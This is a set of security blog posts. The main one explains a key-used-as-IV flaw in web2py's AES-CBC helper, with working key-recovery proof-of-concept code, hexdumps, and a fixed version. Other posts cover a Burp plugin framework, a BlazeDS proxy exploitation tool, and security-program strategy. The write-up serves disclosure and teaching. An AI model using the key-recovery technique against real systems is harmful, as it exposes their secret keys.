It's not uncommon for developers to accidentally (or purposefully) commit
passwords or other information supposed to remain secret into revision
control. It's also not uncommon to see RSA private keys indexed by Google,
and GitHub made it even easier to find secrets in the code with their new
search features. These same search features make it easy to grep the web
for all kinds of insecure code patterns, especially insecure cryptographic
constructions. For example, a simple search for AES.new( in Python code
repositories revealed to me the web2py project was using the encryption key
as the initialization vector (IV), which is the focus of this blog post.
Why is this bad? Well, in a post to the sci.crypt newsgroup back
in 1996, David Wagner explains why you should never do this.
Let's take a look at the insecure construction in web2py's gluon.utils
module prior to merging my pull request that fixed this issue.
from Crypto.Cipher import AES

# Insecure: the first 16 bytes of the key double as the CBC IV
AES_new = lambda key: AES.new(key, AES.MODE_CBC, IV=key[:16])
From an attacker's perspective (in short), if we can control the ciphertext
being fed to this function and see its output (the decrypted text), we can
easily deduce the key used to perform the encryption. The following code
demonstrates this:
KEY = 'testtesttesttest'
PTEXT = 'The quick brown fox jumped over the lazy dog.The quick brown fox'
def xor(a, b):
    return bytearray(x ^ y for x, y in zip(a, b))
# ciphertext produced by web2py
ctext = bytearray(AES_new(KEY).encrypt(PTEXT))
# our (malformed) ciphertext we plan to feed to web2py
mtext = ctext[:16] * 4
mtext[16:32] = [0x0] * 16
# if at any point we can observe the decrypted data
ptext = bytearray(AES_new(KEY).decrypt(str(mtext)))
# we can easily recover the secret key used:
print('KEY: %r' % (str(xor(ptext[:16], ptext[32:48])), ))
Running this exploit returns the following (I've included hexdumps at each
step of the way):
0x00: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x10: 19 ef 66 aa 2e a6 f7 77 2a 15 e8 1b 72 28 30 fb ..f....w....r.0.
0x20: ea 38 af 2c 1f db bf 63 40 e9 70 75 92 aa df d4 .8.....c..pu....
0x30: ce 57 b9 82 59 7e b1 e9 3c c3 11 f2 5e a7 3b 5d .W..Y...........
0x00: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x20: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x30: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x00: 54 68 65 20 71 75 69 63 6b 20 62 72 6f 77 6e 20 The.quick.brown.
0x10: 52 0b 27 65 2b e2 f4 a1 c9 78 b5 7c 09 67 a3 4c R..e.....x...g.L
0x20: 20 0d 16 54 05 10 1a 17 1f 45 11 06 1b 12 1d 54 ...T.....E.....T
0x30: 99 5b 0b 92 0f 72 35 1e e7 8e 58 f2 61 22 6c ce .....r5...X.a.l.
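To see why that final XOR recovers the key, recall that CBC decryption computes P_i = D(C_i) xor C_{i-1}, with C_0 = IV. Our malformed ciphertext starts with C1 | 0 | C1, so P1 = D(C1) xor IV = D(C1) xor key, and P3 = D(C1) xor 0 = D(C1); XORing the two plaintext blocks cancels D(C1) and leaves the key. The identity doesn't depend on AES at all, as this self-contained sketch shows, using a toy 16-byte permutation in place of AES block decryption:

```python
import os

BLOCK = 16

def toy_D(block):
    # Toy stand-in for AES block decryption: any fixed bijection
    # on 16-byte blocks illustrates the CBC identity equally well.
    return bytes(b ^ 0xA5 for b in block)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_decrypt(key, ctext):
    # CBC decryption with the insecure IV = key[:16] construction
    iv = key[:BLOCK]
    blocks = [ctext[i:i + BLOCK] for i in range(0, len(ctext), BLOCK)]
    prev, out = iv, b''
    for c in blocks:
        out += xor(toy_D(c), prev)
        prev = c
    return out

key = os.urandom(16)
c1 = os.urandom(16)                     # any "ciphertext" block works
mtext = c1 + b'\x00' * 16 + c1          # C1 | 0 | C1
ptext = cbc_decrypt(key, mtext)
# P1 xor P3 cancels D(C1), leaving IV xor 0 = key
recovered = xor(ptext[:16], ptext[32:48])
assert recovered == key
```

This is why, in the hexdumps above, XORing the first and third plaintext blocks of the malformed message yields the web2py encryption key.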
Is web2py vulnerable?
In short, no. The manner in which AES_new was used across web2py's
codebase did not appear to be exploitable. web2py was using it to encrypt
pickled session data in a cookie in secure_dumps, authenticating the result
with an HMAC (which, coincidentally, was also vulnerable to a timing attack).
However, applications that use AES_new as a convenience function for
decrypting data provided by the user are most likely vulnerable, amongst
other vulnerabilities that tend to crop up when rolling your own crypto.
If you've been keeping up with web2py's master, my merged pull request
patches the AES_new function to return a random IV any time it is invoked
and uses a more secure, constant-time compare function to validate the HMAC.
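The shape of the fix can be sketched as follows. This is a minimal illustration, not web2py's actual patch, and HMAC_KEY here is a placeholder: the IV is drawn fresh from os.urandom for every encryption (and shipped alongside the ciphertext), and the authentication tag is checked with hmac.compare_digest, the standard library's constant-time comparison.

```python
import hashlib
import hmac
import os

# Placeholder key for illustration only; in practice it is random and secret
HMAC_KEY = b'0123456789abcdef'

def sign(data):
    # Append an HMAC-SHA256 tag so any tampering is detectable
    tag = hmac.new(HMAC_KEY, data, hashlib.sha256).digest()
    return data + tag

def verify(blob):
    # Split off the 32-byte tag and recompute it over the payload
    data, tag = blob[:-32], blob[-32:]
    expected = hmac.new(HMAC_KEY, data, hashlib.sha256).digest()
    # compare_digest takes time independent of where the bytes differ,
    # closing the timing side channel mentioned above
    if not hmac.compare_digest(tag, expected):
        return None
    return data

# A fresh random IV per message -- never derived from the key
iv = os.urandom(16)
blob = sign(iv + b'...ciphertext bytes...')
assert verify(blob) == iv + b'...ciphertext bytes...'
# Flipping a single bit causes verification to fail
tampered = blob[:-1] + bytes([blob[-1] ^ 1])
assert verify(tampered) is None
```

Because the IV is random and authenticated along with the ciphertext, an attacker can no longer choose it, and Wagner's key-recovery trick above no longer applies.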
Last year, I released the Jython Burp API,
a plugin framework to Burp that allows running multiple plugins simultaneously,
exposes an interactive Jython console, provides Filter-like
functionality, and eases developing plugins at runtime by providing more
Pythonic APIs and automatic code reloading for when code or configurations
are updated. I presented an overview of my framework at an iSec Partners Forum
in NYC last year. Others have released similar frameworks that also provide the
ability to write Burp extensions in Jython.
Since then, PortSwigger released a new Burp Extender API, allowing users
to develop all sorts of plugins and extend Burp's various tools in a myriad
of ways. Regardless, I still find that my framework and others like Buby
have their place. I'd like to take the next few paragraphs to guide users
on setting up the Jython Burp API in their environment.
First, we'll need to get the latest 2.7+ standalone version of Jython.
At the time of this writing, the latest version is Jython 2.7beta1.
Once you download Jython, configure Burp's Python Environment.
Loading the Jython Burp API
If you haven't already done so, download the Jython Burp API. Then, all
you need to do (provided you're running Burp 1.5.04 or later), is add
jython-burp-api/Lib/burp_extender.py as a Python extension to Burp:
After you've clicked next, you should see the extension among the list of other
currently loaded extensions (if any).
An additional feature you may find useful is an interactive Jython console
tab that allows you to interact with the Burp Extender object and any other
variables in the local namespace. I find it useful to iterate over requests in
Burp's Proxy History, collecting various information or highlighting/commenting
requests that may contain a specific header or string in the response body.
I added a right-click context menu item so you could select specific requests
and send them to the items variable, accessible from the console.
In a future blog post, I may dive into using some of the other features of
the framework. In the mean time, please feel free to fork and contribute to
the Jython Burp API!
I've posted an entry over on my employer's blog on Penetrating
Intranets through Adobe Flex.
I've also released a new tool along with it, called Blazentoo. This tool
exploits insecurely configured BlazeDS Proxy Services, potentially
allowing you to browse internal web sites. You can download Blazentoo
from GDS' tools page.
Also, be sure to check out my other post from a while back, Pentesting
Adobe Flex Applications with a Custom AMF Client.
This post explains how to write a Python client that makes remoting
calls to a remote Flex server.
In my most recent post, I identified the direction and state-of-the-art
in application security. We all know of the importance of application
security in today's environments. However, finding out where to fit
application security policies and programs into an overall security
program (or organizational security plan) is as difficult as (or more
difficult than) integrating mandatory regulations, compliance standards,
secure enterprise architectures, and many other risk management concerns.
Building a continually improving security program is an important and
common topic. For many CISOs and other directors of security programs --
this has been their day job since they earned their titles. There still
exist huge gaps between IT/Operations, Application Development, and
Information Security Management organizations and how they work
together. There are gaps in communication between departments, and even
within departments. The challenges of finding and retaining talent are
not unique to appsec, as suggested in my last post.
I've only spoken about building a security program
once before on this blog, but it's a popular conversation making the
rounds. securitymetrics.org (the blog,
mailing-list, Metricon conferences, and book) resurfaced a lot of my
interest, as well as the work that Mike
Rothman did with the Pragmatic
CSO, Michael Santarchangelo with his book
and the SecurityCatalyst
blog/podcast/forums, and numerous others.
Not all security programs and bloggers have picked up on these
resources. Take Creating a Solid Security Program by Kirk Greene, from
Accuvant's new blog, Insight.
He appears to be familiar with some of the above
resources, but I think there is a lot more out there. After you read my
comment (which never got "approved"), be sure to check out the new
material I've been reading on the state-of-art in information security
management, especially including the human element.
Comment gone wrong #2
I think what you wrote here is a great example of a vulnerability
management program, but not a security program. Even then, it's actually
more operational (like a compliance initiative) because it gives little
strategic or tactical advice.
Starting with awareness is probably the worst way to build a
vulnerability management or security program. Maybe we just disagree,
but I'd like to see some evidence or metrics demonstrating that this
technique has any value, if you can point me to the literature.
Capital planning based on current or mock Strategy Maps and
Scorecards/Dashboards is really the first step for building a security
program. It is often best to first work with risk management (an
operational activity) that can feed metrics up to the strategy, although
this should be done along with compliance, regulatory requirements, and
potential liability factors. Risk assessments, especially ones done with
data classifications, can be the tactical metrics to pull into a risk
management report. Simple risk assessments can be done using business
tools such as 5 Forces, PESTEL, and/or SWOT analysis -- although in
security we have various others including FAIR, FMEA, and PRA.
I also like the concept of drilling down another strategic metric
platform via Enterprise Architecture, in particular an Enterprise
Architecture Blueprint (such as the one from Gunnar Peterson).
Enterprise Architecture can bring metrics down to the operational level
with security policy and certification standards. These can be turned
into server and application hardening standards at the tactical level.
Finally, asset/inventory management is another strategic activity that
can be conducted to build a proper security program. When combined with
the risk analysis data, asset management will provide guidance on where
to scan & patch, pen-test, and perform exploit development activities at
the tactical level. These tactical procedures can then provide more
metrics up to risk management, and back again up to more strategic planning.
On a second or further iteration, a balanced scorecard can easily be
created to include compliance metrics (operational) along with a
strategic direction (suggested as a strategy map). The balanced
scorecard could then include metrics from incident management, which in
turn could feed back into risk management and liability factors. SABSA
could be used to build a governance program to keep the capital planning
and security program alive and running with the rest of the business.
Additional qualitative metrics based on organizational development and
organizational behavior could be included in a hybrid platform such as
business scorecards very easily, including Six Sigma metrics such as
Voice of the Customer, et al. Simple, isn't it?
Your notion of using Application Security Scanners in a vulnerability
management program disturbs me -- especially in the way you have
suggested it. Maybe you're not familiar with these tools or how an
application assessment is best performed to today's standards.
First of all, the surface coverage for even the best app scanners is
94%, with many getting less than 1% surface coverage. Even IBM/Rational
AppScan was only showing 74% surface coverage using modern link
extraction application drivers.
Secondly, the false negative rate of app scanners is approaching 92%,
often more. The false positive rate varies between tools, testers and
apps, but I've seen figures as high as 40%. App scanners must be
properly configured and utilized by an expert in order to be effective
at all. Even then, black-box app scanners need to be combined with
static analysis and manual expert review for a significant majority of
applications falling under "most-risky" data classifications such as PII
(PCI-DSS, HIPAA, state performance auditing, etc) or financial data
(SOX, GLB, et al). Even middle-of-the-road risky data classifications
(e.g. proprietary information that has yet to be patented) should
probably have more done to them than a simple black-box app scanner.
When I say manual review + static analysis, I really mean it. The
automated tools pay for themselves by the amount of time saved -- but
can never be used alone. Security review tools that implement static
analysis techniques, such as Fortify, Ounce, Checkmarx, Parasoft,
Grammatech, DevInspect, AppScan DE, Coverity, Klocwork, and SciTools
have better false negative rates than black-box scanners, but much worse
false positive error rates. FN is usually between 65-85% (the tool FAILS
to find vulnerabilities this often); FP is 85-99%, you'll often see more
"vulnerabilities found" than lines of code averaged across apps. This is
why manual expert review with full-knowledge remains the best
application assessment technique.
I don't mean to be too harsh on you, but it does appear that you need
to do more homework before making prescriptions for building a security
program -- let alone a vulnerability management program. You seem to be
capable of providing this information accurately (based on your last
blog post and the great blogroll you've setup so far), so I expect
better out of future blog posts.
Aftermath and reasoning
The consulting companies that I work with (and other colleagues, often
consultants from other consulting companies that have been on the same
or similar engagements with me) have all taken a strong interest in
building trusted advisory adjuncts to the "too busy IT manager" or
Mascot CISO/CSO. We have to in order to remain relevant and respected.
However, I've always viewed consultants as "the colostomy bag of a very
ill organization". Fix the organization and the technology advancements
(or whatever else is needed) become agile and sustainable.
Rafal Los recently featured me in 31337 Spotlight: Andre
on his Digital Soapbox blog.
BTW - Thanks Rafal -- hope you and nearly everyone else are having fun
in Vegas right now! There are a few links which may have got lost in my
nonsensical chatter, so I wanted to specifically point them out. I said:
I like the idea that I can use my hacking skills for good and cause
organizational change through discovery of organizational dysfunction.
A real "hack" to me is to take a dysfunctional
organization (http://blogs.bnet.com/ceo/?p=1462) and turn it into a
functional one.
There are very few state-of-the-art resources on organizational theory
combined with information security management. Allow me to point you to
the few that I'm familiar with and highly recommend. After you check
them out, you may find yourself coming to similar or related conclusions
as I did with the above comment.
- David Lacey, author of Managing the Human Factor in Information
Security: How to Win over Staff and Influence Business
- Krag Brotby, author of Information Security Metrics: A Definitive
Guide to Effective Security Monitoring and
Measurement and Information
- Ron Person, author of Balanced Scorecards & Operational Dashboards
With Microsoft Excel -- one of many
books on Balanced Scorecards, but very recently written and one that caught my attention.
- Ian Gorrie, blogger of Bad Penny, with posts such as the most recent
The Trials of
Toorcamp where he
kindly provided the slides to his talk entitled "Hacking HR". He has
even posted earlier on information security management (or as he
calls it security information
management, an interesting but perhaps
confusing twist there). My favorite was a presentation he did at
ITCi 2007 that is a must-see.
- Kevin Nassery (@knassery), who spoke
  at LayerOne 2009 on Diplomatic Security
I have at least one more of these "comments gone X" posts, but the next
ones should both begin and end on more positive notes. If you have any
suggestions of comments you've seen from me that you would like to see
turned into a blog post, let me know!